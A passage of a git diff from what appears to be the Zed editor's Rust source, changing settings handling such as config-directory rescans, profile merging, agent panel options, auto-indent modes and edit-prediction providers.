test_watch_config_dir_reloads_tracked_file_on_rescan(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + + let fs = FakeFs::new(cx.background_executor.clone()); + let config_dir = PathBuf::from("/root/config"); + let settings_path = PathBuf::from("/root/config/settings.json"); + + fs.insert_tree( + Path::new("/root"), + json!({ + "config": { + "settings.json": "A" + } + }), + ) + .await; + + let mut rx = watch_config_dir( + &cx.background_executor, + fs.clone(), + config_dir.clone(), + HashSet::from_iter([settings_path.clone()]), + ); + + assert_eq!(rx.next().await.as_deref(), Some("A")); + cx.run_until_parked(); + + fs.pause_events(); + fs.insert_file(&settings_path, b"B".to_vec()).await; + fs.clear_buffered_events(); + + fs.emit_fs_event(&settings_path, Some(PathEventKind::Rescan)); + fs.unpause_events_and_flush(); + assert_eq!(rx.next().await.as_deref(), Some("B")); + + fs.pause_events(); + fs.insert_file(&settings_path, b"A".to_vec()).await; + fs.clear_buffered_events(); + + fs.emit_fs_event(&config_dir, Some(PathEventKind::Rescan)); + fs.unpause_events_and_flush(); + assert_eq!(rx.next().await.as_deref(), Some("A")); + } +} + pub const EMPTY_THEME_NAME: &str = "empty-theme"; /// Settings for visual tests that use proper fonts instead of Courier. 
@@ -139,8 +194,25 @@ pub fn watch_config_dir( return; } } + Some(PathEventKind::Rescan) => { + for file_path in &config_paths { + let contents = fs.load(file_path).await.unwrap_or_default(); + if tx.unbounded_send(contents).is_err() { + return; + } + } + } _ => {} } + } else if matches!(event.kind, Some(PathEventKind::Rescan)) + && event.path == dir_path + { + for file_path in &config_paths { + let contents = fs.load(file_path).await.unwrap_or_default(); + if tx.unbounded_send(contents).is_err() { + return; + } + } } } } diff --git a/crates/settings/src/settings_store.rs b/crates/settings/src/settings_store.rs index 411f57375a2303e5e2c30e182365f526989891a4..577ba43e1dd566d32eeec8993ec135633146b020 100644 --- a/crates/settings/src/settings_store.rs +++ b/crates/settings/src/settings_store.rs @@ -36,8 +36,8 @@ use crate::{ LanguageToSettingsMap, LspSettings, LspSettingsMap, SemanticTokenRules, ThemeName, UserSettingsContentExt, VsCodeSettings, WorktreeId, settings_content::{ - ExtensionsSettingsContent, ProjectSettingsContent, RootUserSettings, SettingsContent, - UserSettingsContent, merge_from::MergeFrom, + ExtensionsSettingsContent, ProfileBase, ProjectSettingsContent, RootUserSettings, + SettingsContent, UserSettingsContent, merge_from::MergeFrom, }, }; @@ -241,6 +241,11 @@ impl LocalSettingsPath { impl Global for SettingsStore {} +#[derive(Default)] +pub struct DefaultSemanticTokenRules(pub SemanticTokenRules); + +impl gpui::Global for DefaultSemanticTokenRules {} + #[doc(hidden)] #[derive(Debug)] pub struct SettingValue { @@ -275,29 +280,22 @@ pub struct SettingsJsonSchemaParams<'a> { impl SettingsStore { pub fn new(cx: &mut App, default_settings: &str) -> Self { - Self::new_with_semantic_tokens(cx, default_settings, &crate::default_semantic_token_rules()) + Self::new_with_semantic_tokens(cx, default_settings) } - pub fn new_with_semantic_tokens( - cx: &mut App, - default_settings: &str, - default_semantic_tokens: &str, - ) -> Self { + pub fn 
new_with_semantic_tokens(cx: &mut App, default_settings: &str) -> Self { let (setting_file_updates_tx, mut setting_file_updates_rx) = mpsc::unbounded(); - let mut default_settings: SettingsContent = + let default_settings: SettingsContent = SettingsContent::parse_json_with_comments(default_settings).unwrap(); - if let Ok(semantic_token_rules) = - crate::parse_json_with_comments::(default_semantic_tokens) - { - let global_lsp = default_settings - .global_lsp_settings - .get_or_insert_with(Default::default); - let existing_rules = global_lsp - .semantic_token_rules - .get_or_insert_with(Default::default); - existing_rules.rules.extend(semantic_token_rules.rules); + if !cx.has_global::() { + cx.set_global::( + crate::parse_json_with_comments::( + &crate::default_semantic_token_rules(), + ) + .map(DefaultSemanticTokenRules) + .unwrap_or_default(), + ); } - let default_settings: Rc = default_settings.into(); let mut this = Self { setting_values: Default::default(), @@ -372,6 +370,10 @@ impl SettingsStore { setting_value.set_global_value(value); } + pub fn merged_settings(&self) -> &SettingsContent { + &self.merged_settings + } + /// Get the value of a setting. 
/// /// Panics if the given setting type has not been registered, or if there is no @@ -544,9 +546,9 @@ impl SettingsStore { update: impl 'static + Send + FnOnce(&mut SettingsContent, &App), ) { _ = self.update_settings_file_inner(fs, move |old_text: String, cx: AsyncApp| { - Ok(cx.read_global(|store: &SettingsStore, cx| { + cx.read_global(|store: &SettingsStore, cx| { store.new_text_for_update(old_text, |content| update(content, cx)) - })) + }) }); } @@ -556,9 +558,9 @@ impl SettingsStore { vscode_settings: VsCodeSettings, ) -> oneshot::Receiver> { self.update_settings_file_inner(fs, move |old_text: String, cx: AsyncApp| { - Ok(cx.read_global(|store: &SettingsStore, _cx| { + cx.read_global(|store: &SettingsStore, _cx| { store.get_vscode_edits(old_text, &vscode_settings) - })) + }) }) } @@ -749,16 +751,16 @@ impl SettingsStore { &self, old_text: String, update: impl FnOnce(&mut SettingsContent), - ) -> String { - let edits = self.edits_for_update(&old_text, update); + ) -> Result { + let edits = self.edits_for_update(&old_text, update)?; let mut new_text = old_text; for (range, replacement) in edits.into_iter() { new_text.replace_range(range, &replacement); } - new_text + Ok(new_text) } - pub fn get_vscode_edits(&self, old_text: String, vscode: &VsCodeSettings) -> String { + pub fn get_vscode_edits(&self, old_text: String, vscode: &VsCodeSettings) -> Result { self.new_text_for_update(old_text, |content| { content.merge_from(&vscode.settings_content()) }) @@ -770,10 +772,17 @@ impl SettingsStore { &self, text: &str, update: impl FnOnce(&mut SettingsContent), - ) -> Vec<(Range, String)> { - let old_content = UserSettingsContent::parse_json_with_comments(text) - .log_err() - .unwrap_or_default(); + ) -> Result, String)>> { + let old_content = if text.trim().is_empty() { + UserSettingsContent::default() + } else { + let (old_content, parse_status) = UserSettingsContent::parse_json(text); + if let ParseStatus::Failed { error } = &parse_status { + log::error!("Failed to 
parse settings for update: {error}"); + } + old_content + .context("Settings file could not be parsed. Fix syntax errors before updating.")? + }; let mut new_content = old_content.clone(); update(&mut new_content.content); @@ -792,7 +801,18 @@ impl SettingsStore { &new_value, &mut edits, ); - edits + Ok(edits) + } + + /// Mutates the default settings in place and recomputes all setting values. + pub fn update_default_settings( + &mut self, + cx: &mut App, + update: impl FnOnce(&mut SettingsContent), + ) { + let default_settings = Rc::make_mut(&mut self.default_settings); + update(default_settings); + self.recompute_values(None, cx); } /// Sets the default settings via a JSON string. @@ -868,18 +888,30 @@ impl SettingsStore { /// Sets language-specific semantic token rules. /// /// These rules are registered by language modules (e.g. the Rust language module) - /// and are stored separately from the global rules. They are only applied to - /// buffers of the matching language by the `SemanticTokenStylizer`. + /// or by third-party extensions (via `semantic_token_rules.json` in their language + /// directories). They are stored separately from the global rules and are only + /// applied to buffers of the matching language by the `SemanticTokenStylizer`. /// - /// These should be registered before any `SemanticTokenStylizer` instances are - /// created (typically during `languages::init`), as existing cached stylizers - /// are not automatically invalidated. + /// This triggers a settings recomputation so that observers (e.g. `LspStore`) + /// are notified and can invalidate cached stylizers. pub fn set_language_semantic_token_rules( &mut self, language: SharedString, rules: SemanticTokenRules, + cx: &mut App, ) { self.language_semantic_token_rules.insert(language, rules); + self.recompute_values(None, cx); + } + + /// Removes language-specific semantic token rules for the given language. 
+ /// + /// This should be called when an extension that registered rules for a language + /// is unloaded. Triggers a settings recomputation so that observers (e.g. + /// `LspStore`) are notified and can invalidate cached stylizers. + pub fn remove_language_semantic_token_rules(&mut self, language: &str, cx: &mut App) { + self.language_semantic_token_rules.remove(language); + self.recompute_values(None, cx); } /// Returns the language-specific semantic token rules for the given language, @@ -1178,10 +1210,19 @@ impl SettingsStore { merged.merge_from_option(self.extension_settings.as_deref()); merged.merge_from_option(self.global_settings.as_deref()); if let Some(user_settings) = self.user_settings.as_ref() { - merged.merge_from(&user_settings.content); - merged.merge_from_option(user_settings.for_release_channel()); - merged.merge_from_option(user_settings.for_os()); - merged.merge_from_option(user_settings.for_profile(cx)); + let active_profile = user_settings.for_profile(cx); + let should_merge_user_settings = + active_profile.is_none_or(|profile| profile.base == ProfileBase::User); + + if should_merge_user_settings { + merged.merge_from(&user_settings.content); + merged.merge_from_option(user_settings.for_release_channel()); + merged.merge_from_option(user_settings.for_os()); + } + + if let Some(profile) = active_profile { + merged.merge_from(&profile.settings); + } } merged.merge_from_option(self.server_settings.as_deref()); @@ -1399,9 +1440,7 @@ impl std::fmt::Display for InvalidSettingsError { | InvalidSettingsError::DefaultSettings { message } | InvalidSettingsError::Tasks { message, .. } | InvalidSettingsError::Editorconfig { message, .. } - | InvalidSettingsError::Debug { message, .. } => { - write!(f, "{message}") - } + | InvalidSettingsError::Debug { message, .. 
} => write!(f, "{message}"), } } } @@ -1678,7 +1717,7 @@ mod tests { cx: &mut App, ) { store.set_user_settings(&old_json, cx).ok(); - let edits = store.edits_for_update(&old_json, update); + let edits = store.edits_for_update(&old_json, update).unwrap(); let mut new_json = old_json; for (range, replacement) in edits.into_iter() { new_json.replace_range(range, &replacement); @@ -1696,7 +1735,7 @@ mod tests { r#"{ "languages": { "JSON": { - "auto_indent": true + "auto_indent": "syntax_aware" } } }"# @@ -1706,12 +1745,12 @@ mod tests { .languages_mut() .get_mut("JSON") .unwrap() - .auto_indent = Some(false); + .auto_indent = Some(crate::AutoIndentMode::None); settings.languages_mut().insert( "Rust".into(), LanguageSettingsContent { - auto_indent: Some(true), + auto_indent: Some(crate::AutoIndentMode::SyntaxAware), ..Default::default() }, ); @@ -1719,10 +1758,10 @@ mod tests { r#"{ "languages": { "Rust": { - "auto_indent": true + "auto_indent": "syntax_aware" }, "JSON": { - "auto_indent": false + "auto_indent": "none" } } }"# @@ -1866,6 +1905,39 @@ mod tests { ); } + #[gpui::test] + fn test_edits_for_update_preserves_unknown_keys(cx: &mut App) { + let mut store = SettingsStore::new(cx, &test_settings()); + store.register_setting::(); + + let old_json = r#"{ + "some_unknown_key": "should_be_preserved", + "auto_update": false + }"# + .unindent(); + + check_settings_update( + &mut store, + old_json, + |settings| settings.auto_update = Some(true), + r#"{ + "some_unknown_key": "should_be_preserved", + "auto_update": true + }"# + .unindent(), + cx, + ); + } + + #[gpui::test] + fn test_edits_for_update_returns_error_on_invalid_json(cx: &mut App) { + let store = SettingsStore::new(cx, &test_settings()); + + let invalid_json = r#"{ this is not valid json at all !!!"#; + let result = store.edits_for_update(invalid_json, |_| {}); + assert!(result.is_err()); + } + #[gpui::test] fn test_vscode_import(cx: &mut App) { let mut store = SettingsStore::new(cx, &test_settings()); @@ 
-1986,10 +2058,12 @@ mod tests { cx: &mut App, ) { store.set_user_settings(&old, cx).ok(); - let new = store.get_vscode_edits( - old, - &VsCodeSettings::from_str(&vscode, VsCodeSettingsSource::VsCode).unwrap(), - ); + let new = store + .get_vscode_edits( + old, + &VsCodeSettings::from_str(&vscode, VsCodeSettingsSource::VsCode).unwrap(), + ) + .unwrap(); pretty_assertions::assert_eq!(new, expected); } @@ -1997,14 +2071,16 @@ mod tests { fn test_update_git_settings(cx: &mut App) { let store = SettingsStore::new(cx, &test_settings()); - let actual = store.new_text_for_update("{}".to_string(), |current| { - current - .git - .get_or_insert_default() - .inline_blame - .get_or_insert_default() - .enabled = Some(true); - }); + let actual = store + .new_text_for_update("{}".to_string(), |current| { + current + .git + .get_or_insert_default() + .inline_blame + .get_or_insert_default() + .enabled = Some(true); + }) + .unwrap(); pretty_assertions::assert_str_eq!( actual, r#"{ diff --git a/crates/settings/src/vscode_import.rs b/crates/settings/src/vscode_import.rs index 8a5a497d265c02787d6944915c0dba56e2381a79..1211cbd8a4519ea295773eb0d979b48258908311 100644 --- a/crates/settings/src/vscode_import.rs +++ b/crates/settings/src/vscode_import.rs @@ -219,6 +219,7 @@ impl VsCodeSettings { vim_mode: None, workspace: self.workspace_settings_content(), which_key: None, + modeline_lines: None, } } @@ -307,6 +308,7 @@ impl VsCodeSettings { completion_menu_scrollbar: None, completion_detail_alignment: None, diff_view_style: None, + minimum_split_diff_width: None, } } @@ -507,7 +509,6 @@ impl VsCodeSettings { context_servers: self.context_servers(), context_server_timeout: None, load_direnv: None, - slash_commands: None, git_hosting_providers: None, disable_ai: None, } @@ -768,6 +769,7 @@ impl VsCodeSettings { fn status_bar_settings_content(&self) -> Option { skip_default(StatusBarSettingsContent { show: self.read_bool("workbench.statusBar.visible"), + show_active_file: None, 
active_language_button: None, cursor_position_button: None, line_endings_button: None, @@ -793,7 +795,12 @@ impl VsCodeSettings { hide_root: None, indent_guides: None, indent_size: None, - scrollbar: None, + scrollbar: self.read_bool("workbench.list.horizontalScrolling").map( + |horizontal_scrolling| ProjectPanelScrollbarSettingsContent { + show: None, + horizontal_scroll: Some(horizontal_scrolling), + }, + ), show_diagnostics: self .read_bool("problems.decorations.enabled") .and_then(|b| if b { Some(ShowDiagnostics::Off) } else { None }), @@ -802,6 +809,7 @@ impl VsCodeSettings { sticky_scroll: None, auto_open: None, diagnostic_badges: None, + git_status_indicator: None, }; if let (Some(false), Some(false)) = ( @@ -872,6 +880,8 @@ impl VsCodeSettings { scrollbar: None, scroll_multiplier: None, toolbar: None, + show_count_badge: None, + flexible: None, }) } @@ -989,6 +999,7 @@ impl VsCodeSettings { } }), zoomed_padding: None, + focus_follows_mouse: None, } } diff --git a/crates/settings_content/Cargo.toml b/crates/settings_content/Cargo.toml index 1908e6623be5766c1ab8b8a9bb91c67906e7b76c..b3599e9eef3b7ac5680f441369a7cbdc98a5d043 100644 --- a/crates/settings_content/Cargo.toml +++ b/crates/settings_content/Cargo.toml @@ -28,9 +28,3 @@ settings_json.workspace = true settings_macros.workspace = true strum.workspace = true util.workspace = true - -# Uncomment other workspace dependencies as needed -# assistant.workspace = true -# client.workspace = true -# project.workspace = true -# settings.workspace = true diff --git a/crates/settings_content/src/agent.rs b/crates/settings_content/src/agent.rs index 87e117b8b0bbdd9a789bae18c3f9dce98a6f1bc0..5b1b3c014f8c538cb0dff506e05d84a80dc863d1 100644 --- a/crates/settings_content/src/agent.rs +++ b/crates/settings_content/src/agent.rs @@ -9,6 +9,92 @@ use crate::ExtendingVec; use crate::DockPosition; +/// Where new threads should start by default. 
+#[derive( + Clone, + Copy, + Debug, + Default, + PartialEq, + Eq, + Serialize, + Deserialize, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum NewThreadLocation { + /// Start threads in the current project. + #[default] + LocalProject, + /// Start threads in a new worktree. + NewWorktree, +} + +/// Where to position the sidebar. +#[derive( + Clone, + Copy, + Debug, + Default, + PartialEq, + Eq, + Serialize, + Deserialize, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum SidebarDockPosition { + /// Always show the sidebar on the left side. + #[default] + Left, + /// Always show the sidebar on the right side. + Right, +} + +#[derive(Copy, Clone, Debug, Default, PartialEq, Eq)] +pub enum SidebarSide { + #[default] + Left, + Right, +} + +/// How thinking blocks should be displayed by default in the agent panel. +#[derive( + Clone, + Copy, + Debug, + Default, + PartialEq, + Eq, + Serialize, + Deserialize, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum ThinkingBlockDisplay { + /// Thinking blocks fully expand during streaming, then auto-collapse + /// when the model finishes thinking. Users can re-expand after collapse. + #[default] + Auto, + /// Thinking blocks auto-expand with a height constraint during streaming, + /// then remain in their constrained state when complete. Users can click + /// to fully expand or collapse. + Preview, + /// Thinking blocks are always fully expanded by default (no height constraint). + AlwaysExpanded, + /// Thinking blocks are always collapsed by default. 
+ AlwaysCollapsed, +} + #[with_fallible_options] #[derive(Clone, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom, Debug, Default)] pub struct AgentSettingsContent { @@ -24,6 +110,14 @@ pub struct AgentSettingsContent { /// /// Default: right pub dock: Option, + /// Whether the agent panel should use flexible (proportional) sizing. + /// + /// Default: true + pub flexible: Option, + /// Where to position the sidebar. + /// + /// Default: left + pub sidebar_side: Option, /// Default width in pixels when the agent panel is docked to the left or right. /// /// Default: 640 @@ -55,20 +149,20 @@ pub struct AgentSettingsContent { /// /// Default: write pub default_profile: Option>, - /// Which view type to show by default in the agent panel. + /// Where new threads should start by default. /// - /// Default: "thread" - pub default_view: Option, + /// Default: "local_project" + pub new_thread_location: Option, /// The available agent profiles. pub profiles: Option, AgentProfileContent>>, /// Where to show a popup notification when the agent is waiting for user input. /// /// Default: "primary_screen" pub notify_when_agent_waiting: Option, - /// Whether to play a sound when the agent has either completed its response, or needs user input. + /// When to play a sound when the agent has either completed its response, or needs user input. /// - /// Default: false - pub play_sound_when_agent_done: Option, + /// Default: never + pub play_sound_when_agent_done: Option, /// Whether to display agent edits in single-file editors in addition to the review multibuffer pane. /// /// Default: true @@ -94,6 +188,10 @@ pub struct AgentSettingsContent { /// /// Default: true pub expand_terminal_card: Option, + /// How thinking blocks should be displayed by default in the agent panel. + /// + /// Default: automatic + pub thinking_display: Option, /// Whether clicking the stop button on a running terminal tool should also cancel the agent's generation. 
/// Note that this only applies to the stop button, not to ctrl+c inside the terminal. /// @@ -111,6 +209,11 @@ pub struct AgentSettingsContent { /// /// Default: false pub show_turn_stats: Option, + /// Whether to show the merge conflict indicator in the status bar + /// that offers to resolve conflicts using the agent. + /// + /// Default: true + pub show_merge_conflict_indicator: Option, /// Per-tool permission rules for granular control over which tool actions /// require confirmation. /// @@ -129,6 +232,14 @@ impl AgentSettingsContent { self.dock = Some(dock); } + pub fn set_sidebar_side(&mut self, position: SidebarDockPosition) { + self.sidebar_side = Some(position); + } + + pub fn set_flexible_size(&mut self, flexible: bool) { + self.flexible = Some(flexible); + } + pub fn set_model(&mut self, language_model: LanguageModelSelection) { self.default_model = Some(language_model) } @@ -146,6 +257,10 @@ impl AgentSettingsContent { self.default_profile = Some(profile_id); } + pub fn set_new_thread_location(&mut self, value: NewThreadLocation) { + self.new_thread_location = Some(value); + } + pub fn add_favorite_model(&mut self, model: LanguageModelSelection) { if !self.favorite_models.contains(&model) { self.favorite_models.push(model); @@ -216,12 +331,25 @@ pub struct ContextServerPresetContent { pub tools: IndexMap, bool>, } -#[derive(Copy, Clone, Default, Debug, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom)] +#[derive( + Copy, + Clone, + Default, + Debug, + Serialize, + Deserialize, + JsonSchema, + MergeFrom, + PartialEq, + strum::VariantArray, + strum::VariantNames, +)] #[serde(rename_all = "snake_case")] -pub enum DefaultAgentView { +pub enum NotifyWhenAgentWaiting { #[default] - Thread, - TextThread, + PrimaryScreen, + AllScreens, + Never, } #[derive( @@ -238,11 +366,21 @@ pub enum DefaultAgentView { strum::VariantNames, )] #[serde(rename_all = "snake_case")] -pub enum NotifyWhenAgentWaiting { +pub enum PlaySoundWhenAgentDone { #[default] - 
PrimaryScreen, - AllScreens, Never, + WhenHidden, + Always, +} + +impl PlaySoundWhenAgentDone { + pub fn should_play(&self, visible: bool) -> bool { + match self { + PlaySoundWhenAgentDone::Never => false, + PlaySoundWhenAgentDone::WhenHidden => !visible, + PlaySoundWhenAgentDone::Always => true, + } + } } #[with_fallible_options] diff --git a/crates/settings_content/src/editor.rs b/crates/settings_content/src/editor.rs index 4d824e85e0e2ee020f48cdddb530bf494b2ce800..b37192882694f999a5e7f3180e5a7899a8732393 100644 --- a/crates/settings_content/src/editor.rs +++ b/crates/settings_content/src/editor.rs @@ -226,6 +226,14 @@ pub struct EditorSettingsContent { /// /// Default: split pub diff_view_style: Option, + + /// The minimum width (in em-widths) at which the split diff view is used. + /// When the editor is narrower than this, the diff view automatically + /// switches to unified mode and switches back when the editor is wide + /// enough. Set to 0 to disable automatic switching. + /// + /// Default: 100 + pub minimum_split_diff_width: Option, } #[derive( diff --git a/crates/settings_content/src/language.rs b/crates/settings_content/src/language.rs index ab526c405a4b34962c298d68365cb828975628b1..c818ca431e8c651affe511fba0e66fcbb388f5ee 100644 --- a/crates/settings_content/src/language.rs +++ b/crates/settings_content/src/language.rs @@ -81,17 +81,15 @@ pub enum EditPredictionProvider { None, #[default] Copilot, - Supermaven, Zed, Codestral, Ollama, OpenAiCompatibleApi, - Sweep, Mercury, Experimental(&'static str), } -pub const EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME: &str = "zeta2"; +const EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME: &str = "zeta2"; impl<'de> Deserialize<'de> for EditPredictionProvider { fn deserialize(deserializer: D) -> Result @@ -103,12 +101,10 @@ impl<'de> Deserialize<'de> for EditPredictionProvider { pub enum Content { None, Copilot, - Supermaven, Zed, Codestral, Ollama, OpenAiCompatibleApi, - Sweep, Mercury, 
Experimental(String), } @@ -116,19 +112,15 @@ impl<'de> Deserialize<'de> for EditPredictionProvider { Ok(match Content::deserialize(deserializer)? { Content::None => EditPredictionProvider::None, Content::Copilot => EditPredictionProvider::Copilot, - Content::Supermaven => EditPredictionProvider::Supermaven, Content::Zed => EditPredictionProvider::Zed, Content::Codestral => EditPredictionProvider::Codestral, Content::Ollama => EditPredictionProvider::Ollama, Content::OpenAiCompatibleApi => EditPredictionProvider::OpenAiCompatibleApi, - Content::Sweep => EditPredictionProvider::Sweep, Content::Mercury => EditPredictionProvider::Mercury, Content::Experimental(name) if name == EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME => { - EditPredictionProvider::Experimental( - EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME, - ) + EditPredictionProvider::Zed } Content::Experimental(name) => { return Err(D::Error::custom(format!( @@ -146,11 +138,9 @@ impl EditPredictionProvider { EditPredictionProvider::Zed => true, EditPredictionProvider::None | EditPredictionProvider::Copilot - | EditPredictionProvider::Supermaven | EditPredictionProvider::Codestral | EditPredictionProvider::Ollama | EditPredictionProvider::OpenAiCompatibleApi - | EditPredictionProvider::Sweep | EditPredictionProvider::Mercury | EditPredictionProvider::Experimental(_) => false, } @@ -160,14 +150,9 @@ impl EditPredictionProvider { match self { EditPredictionProvider::Zed => Some("Zed AI"), EditPredictionProvider::Copilot => Some("GitHub Copilot"), - EditPredictionProvider::Supermaven => Some("Supermaven"), EditPredictionProvider::Codestral => Some("Codestral"), - EditPredictionProvider::Sweep => Some("Sweep"), EditPredictionProvider::Mercury => Some("Mercury"), - EditPredictionProvider::Experimental( - EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME, - ) => Some("Zeta2"), - EditPredictionProvider::None | EditPredictionProvider::Experimental(_) => None, + EditPredictionProvider::Experimental(_) | 
EditPredictionProvider::None => None, EditPredictionProvider::Ollama => Some("Ollama"), EditPredictionProvider::OpenAiCompatibleApi => Some("OpenAI-Compatible API"), } @@ -191,15 +176,10 @@ pub struct EditPredictionSettingsContent { pub copilot: Option, /// Settings specific to Codestral. pub codestral: Option, - /// Settings specific to Sweep. - pub sweep: Option, /// Settings specific to Ollama. pub ollama: Option, /// Settings specific to using custom OpenAI-compatible servers for edit prediction. pub open_ai_compatible_api: Option, - /// Whether edit predictions are enabled in the assistant prompt editor. - /// This has no effect if globally disabled. - pub enabled_in_text_threads: Option, /// The directory where manually captured edit prediction examples are stored. pub examples_dir: Option>, } @@ -219,8 +199,7 @@ pub struct CustomEditPredictionProviderSettingsContent { /// /// Default: "" pub model: Option, - /// Maximum tokens to generate for FIM models. - /// This setting does not apply to sweep models. + /// Maximum tokens to generate. /// /// Default: 256 pub max_output_tokens: Option, @@ -245,6 +224,7 @@ pub enum EditPredictionPromptFormat { #[default] Infer, Zeta, + Zeta2, CodeLlama, StarCoder, DeepseekCoder, @@ -292,18 +272,6 @@ pub struct CodestralSettingsContent { pub api_url: Option, } -#[with_fallible_options] -#[derive(Clone, Debug, Default, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq)] -pub struct SweepSettingsContent { - /// When enabled, Sweep will not store edit prediction inputs or outputs. - /// When disabled, Sweep may collect data including buffer contents, - /// diagnostics, file paths, repository names, and generated predictions - /// to improve the service. - /// - /// Default: false - pub privacy_mode: Option, -} - /// Ollama model name for edit predictions. 
#[with_fallible_options] #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq, Eq)] @@ -336,7 +304,6 @@ pub struct OllamaEditPredictionSettingsContent { /// Default: none pub model: Option, /// Maximum tokens to generate for FIM models. - /// This setting does not apply to sweep models. /// /// Default: 256 pub max_output_tokens: Option, @@ -378,6 +345,32 @@ pub enum EditPredictionsMode { Eager, } +/// Controls the automatic indentation behavior when typing. +#[derive( + Copy, + Clone, + Debug, + Serialize, + Deserialize, + PartialEq, + Eq, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum AutoIndentMode { + /// Adjusts indentation based on syntax context when typing. + /// Uses tree-sitter to analyze code structure and indent accordingly. + SyntaxAware, + /// Preserve the indentation of the current line when creating new lines, + /// but don't adjust based on syntax context. + PreserveIndent, + /// No automatic indentation. New lines start at column 0. + None, +} + /// Controls the soft-wrapping behavior in the editor. #[derive( Copy, @@ -580,10 +573,14 @@ pub struct LanguageSettingsContent { /// /// Default: true pub linked_edits: Option, - /// Whether indentation should be adjusted based on the context whilst typing. + /// Controls automatic indentation behavior when typing. /// - /// Default: true - pub auto_indent: Option, + /// - "syntax_aware": Adjusts indentation based on syntax context (default) + /// - "preserve_indent": Preserves current line's indentation on new lines + /// - "none": No automatic indentation + /// + /// Default: syntax_aware + pub auto_indent: Option, /// Whether indentation of pasted content should be adjusted based on the context. /// /// Default: true @@ -934,6 +931,8 @@ pub enum Formatter { /// or falling back to formatting via language server. #[default] Auto, + /// Do not format code. 
+ None, /// Format code using Zed's Prettier integration. Prettier, /// Format code using an external command. @@ -1127,6 +1126,12 @@ mod test { settings.formatter, Some(FormatterList::Single(Formatter::Auto)) ); + let raw_none = "{\"formatter\": \"none\"}"; + let settings: LanguageSettingsContent = serde_json::from_str(raw_none).unwrap(); + assert_eq!( + settings.formatter, + Some(FormatterList::Single(Formatter::None)) + ); let raw = "{\"formatter\": \"language_server\"}"; let settings: LanguageSettingsContent = serde_json::from_str(raw).unwrap(); assert_eq!( diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index 6af419119d819931f3ad826ff416f1b47c89824f..4b72c2ad3f47d834dfa38555d80a8646e3940f51 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -16,6 +16,7 @@ pub struct AllLanguageModelSettingsContent { pub lmstudio: Option, pub mistral: Option, pub ollama: Option, + pub opencode: Option, pub open_router: Option, pub openai: Option, pub openai_compatible: Option, OpenAiCompatibleSettingsContent>>, @@ -144,10 +145,29 @@ impl Default for KeepAlive { } } +#[with_fallible_options] +#[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)] +pub struct OpenCodeSettingsContent { + pub api_url: Option, + pub available_models: Option>, +} + +#[with_fallible_options] +#[derive(Clone, Debug, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom)] +pub struct OpenCodeAvailableModel { + pub name: String, + pub display_name: Option, + pub max_tokens: u64, + pub max_output_tokens: Option, + /// The API protocol to use for this model: "anthropic", "openai_responses", "openai_chat", or "google". 
+ pub protocol: String, +} + #[with_fallible_options] #[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)] pub struct LmStudioSettingsContent { pub api_url: Option, + pub api_key: Option, pub available_models: Option>, } @@ -258,6 +278,7 @@ pub struct OpenAiCompatibleAvailableModel { pub max_tokens: u64, pub max_output_tokens: Option, pub max_completion_tokens: Option, + pub reasoning_effort: Option, #[serde(default)] pub capabilities: OpenAiCompatibleModelCapabilities, } diff --git a/crates/settings_content/src/project.rs b/crates/settings_content/src/project.rs index 70544646b1878c163bf5c17d2364eeebd98f6908..6e8b296ef21efa838833038582de82b3ebc4f28b 100644 --- a/crates/settings_content/src/project.rs +++ b/crates/settings_content/src/project.rs @@ -1,5 +1,9 @@ -use std::{path::PathBuf, sync::Arc}; +use std::{ + path::{Path, PathBuf}, + sync::Arc, +}; +use anyhow::Context; use collections::{BTreeMap, HashMap}; use gpui::Rgba; use schemars::JsonSchema; @@ -10,7 +14,7 @@ use util::serde::default_true; use crate::{ AllLanguageSettingsContent, DelayMs, ExtendingVec, ParseStatus, ProjectTerminalSettingsContent, - RootUserSettings, SaturatingBool, SlashCommandSettings, fallible_options, + RootUserSettings, SaturatingBool, fallible_options, }; #[with_fallible_options] @@ -74,9 +78,6 @@ pub struct ProjectSettingsContent { /// Configuration for how direnv configuration should be loaded pub load_direnv: Option, - /// Settings for slash commands. - pub slash_commands: Option, - /// The list of custom Git hosting providers. 
pub git_hosting_providers: Option>, @@ -233,6 +234,26 @@ pub struct SemanticTokenRules { pub rules: Vec, } +impl SemanticTokenRules { + pub const FILE_NAME: &'static str = "semantic_token_rules.json"; + + pub fn load(file_path: &Path) -> anyhow::Result { + let rules_content = std::fs::read(file_path).with_context(|| { + anyhow::anyhow!( + "Could not read semantic token rules from {}", + file_path.display() + ) + })?; + + serde_json_lenient::from_slice::(&rules_content).with_context(|| { + anyhow::anyhow!( + "Failed to parse semantic token rules from {}", + file_path.display() + ) + }) + } +} + impl crate::merge_from::MergeFrom for SemanticTokenRules { fn merge_from(&mut self, other: &Self) { self.rules.splice(0..0, other.rules.iter().cloned()); @@ -255,6 +276,18 @@ pub struct SemanticTokenRule { pub font_style: Option, } +impl SemanticTokenRule { + pub fn no_style_defined(&self) -> bool { + self.style.is_empty() + && self.foreground_color.is_none() + && self.background_color.is_none() + && self.underline.is_none() + && self.strikethrough.is_none() + && self.font_weight.is_none() + && self.font_style.is_none() + } +} + #[derive(Copy, Clone, Debug, Serialize, 